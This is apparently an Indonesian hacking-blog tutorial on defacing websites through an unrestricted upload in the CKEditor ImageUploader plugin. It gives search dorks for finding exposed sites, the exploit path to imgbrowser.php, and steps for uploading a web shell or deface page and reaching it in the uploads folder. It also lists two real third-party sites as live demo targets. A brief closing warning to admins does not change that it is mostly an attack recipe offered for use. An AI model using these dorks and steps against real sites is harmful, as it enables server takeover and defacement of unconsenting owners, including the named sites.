Deface Vulnerability File Upload di Plugin ImageBrowser
Wednesday, October 9, 2019
Edit
Hii Gess , kali ini gw bakalan share method yang lumayan lama lah . Gw kali ini share karena iseng2 coba nyari web vuln ternyata ke inget method ini hehe :v btw method ini di buat dari team typical idiot security dengan codename SPEEDY-03 pasti pada kenal ea kan .
Oke langsung aja ke tutornya
Bahan: - Internet Wajib Pastinya !
- Dork : inurl:/imageuploader/uploads/
inurl:/imageuploader/uploads/ site:.com
- Exploit : /ckeditor/plugins/imageuploader/imgbrowser.php
Langkah:
1.Dorking dulu kek biasa cok .
2.Pilih salah satu web yang menurutmu vuln .
3.Masukkan exploit nya : localhost/ckeditor/plugins/imageuploader/imgbrowser.php
4.Setelah itu serahlu Upshell atau UpSC Deface
5.Akses ? localhost/[Path]/ckeditor/plugins/imageuploader/uploads/
Note: Engga Semua Web Vuln !
Demo:- https://www.rastarita.com/assets/ckeditor/plugins/imageuploader/imgbrowser.php
- https://www.marcelocosta.org/css_js/plugins/ckeditor/plugins/imageuploader/imgbrowser.php
Sekian dari gw , Untuk admin selalu hati-hati dengan plugin uploader, karena attacker bisa meremote server anda melalui shell upload .